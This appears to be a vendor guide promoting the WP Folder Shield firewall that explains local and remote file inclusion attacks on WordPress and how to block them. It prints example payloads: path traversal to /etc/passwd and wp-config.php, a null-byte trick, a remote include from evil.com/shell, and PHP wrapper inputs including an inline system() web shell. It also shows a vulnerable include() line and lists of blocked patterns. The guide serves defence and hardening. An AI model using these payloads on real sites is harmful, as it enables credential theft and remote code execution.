Protecting WordPress from File Inclusion Attacks (LFI/RFI)

Understanding File Inclusion Attacks

File inclusion vulnerabilities allow attackers to include files on your server that shouldn't be accessible, or worse, include remote files from attacker-controlled servers. These attacks can expose your wp-config.php (revealing database credentials), read system files like /etc/passwd, or execute malicious PHP code—potentially leading to complete server compromise.

Local File Inclusion (LFI)

LFI attacks trick the server into including local files that shouldn't be accessible through the web application.

How LFI Works

Consider a vulnerable plugin with code like:

include($_GET['page'] . ".php");

Normal use: ?page=home includes home.php

Attack: ?page=../../../wp-config includes your config file

Path Traversal

The ../ sequence moves up directories. By chaining enough of them, attackers can reach any file on the server:

• ../../../../etc/passwd - Linux user list
• ../../../wp-config.php - Database credentials
• ../../.htaccess - Server configuration

Null Byte Injection

On older PHP versions, attackers use %00 to terminate strings:

?page=../../../etc/passwd%00

This bypasses the .php extension added by the code.

Remote File Inclusion (RFI)

RFI attacks include files from external servers, typically containing malicious PHP code.

How RFI Works

With the same vulnerable code, if allow_url_include is enabled:

?page=http://evil.com/shell

This downloads and executes a remote PHP file on your server.

PHP Wrapper Attacks

PHP wrappers provide additional attack vectors:

• php://filter/convert.base64-encode/resource=wp-config.php - Reads files as base64
• php://input - Reads POST body as code
• data://text/plain,<?php system($_GET['cmd'])?> - Executes inline code

Real-World WordPress Vulnerabilities

File inclusion vulnerabilities have affected many WordPress plugins:

• Slider Revolution (2014) - Massive LFI vulnerability affecting millions of sites
• TimThumb - RFI vulnerability in image processing
• Various theme downloaders - Often vulnerable to path traversal

How WP Folder Shield Protects Against File Inclusion

Path Traversal Detection

The firewall blocks requests containing:

• ../ and ..\ sequences
• URL-encoded variants (%2e%2e%2f)
• Double-encoded attempts
• Unicode encoding tricks

Sensitive File Protection

Blocks direct access attempts to:

• wp-config.php
• .htaccess files
• wp-includes files
• Debug logs
• Backup files (.sql, .bak, .old)

PHP Wrapper Blocking

Detects and blocks malicious PHP wrappers:

• php://filter
• php://input
• data:// protocol
• expect:// (if enabled)
• zip:// and phar:// exploits

Remote URL Blocking

Blocks attempts to include remote files:

• http:// and https:// in include paths
• ftp:// protocol
• External domain references in vulnerable parameters

Server-Level Protections

Beyond the firewall, these PHP settings help:

php.ini Settings

allow_url_fopen = Off    ; Prevents remote file operations
allow_url_include = Off  ; Blocks remote file inclusion
open_basedir = /var/www/ ; Restricts file access to web directory

.htaccess Rules

WP Folder Shield's directory protection adds .htaccess rules that block PHP execution in uploads and other sensitive directories, limiting the impact of successful attacks.

Best Practices for Prevention

For Site Owners

• Keep all plugins and themes updated
• Remove unused plugins and themes
• Use a WAF like WP Folder Shield
• Ensure directory protection is enabled
• Use reputable plugins from trusted developers

For Developers

• Never use user input directly in include/require
• Use a whitelist of allowed files
• Validate and sanitize all input
• Disable allow_url_include
• Use realpath() to resolve paths and validate them

Conclusion

File inclusion attacks remain a serious threat to WordPress sites, capable of exposing sensitive data or enabling remote code execution. WP Folder Shield's firewall provides comprehensive protection by blocking path traversal, PHP wrappers, and remote file inclusion attempts. Combined with directory protection that prevents PHP execution in vulnerable locations, your site gains multiple layers of defense against these dangerous attacks.